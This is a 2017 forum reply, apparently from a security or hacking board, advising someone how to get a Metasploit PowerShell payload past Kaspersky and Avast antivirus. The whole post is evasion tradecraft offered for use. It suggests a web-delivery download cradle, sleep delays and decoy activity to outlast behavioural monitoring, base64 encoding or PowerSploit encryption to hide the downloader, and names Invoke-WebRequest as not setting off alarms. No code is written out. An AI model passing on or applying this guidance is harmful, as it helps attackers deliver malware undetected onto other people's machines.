PoSHMagiC0de Posted June 19, 2017 Share Posted June 19, 2017 Ohh, this one is going to be tough. Don't use shellcode. Instead, you will need to use metasploit's web download handler. From that you just write a download cradle for metasploit script you are downloading and execute it. Now you can modify the cradle to have a sleep if you like before running the real code. Kaspersky will only watch it for so long. To make it not look suspicious, have it do a gci of c:\ to null and maybe write some text to null before sleeping. You may even have to obfuscate the downloader and executer part as a base64 string you can decode and execute to further obfuscate, maybe even dirty it up, if you are using the webclient for PS 2.0 compatability. I notice the new Invoke-WebRequest doesn't seem to fire alarms. You could use Powersploits Out-EncryptedScript script to create a function with encryption to encrypt but do the random junk and sleep before running it to fire off the downloader. You may be able to even try your shellcode with the encrypted script with the random junk and sleep before unscrambling and firing it all off. Avast does something similar when I have compiled .NET exes with obfuscated Powershell code inside. I think most likely it might be you have shellcode inside a Powershell encoded command that is easily seen. Not running in memory when it is right there in the code and being executed. The memory part is after it is running then it can download and run directly from memory. The beginning you are still firing off Powershell.exe from disk with parameters. The web delivery handler and built in command it gives you may do it for you without all the above though that I think of it. Choose encoded to be sure. If not, some of the above may help. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.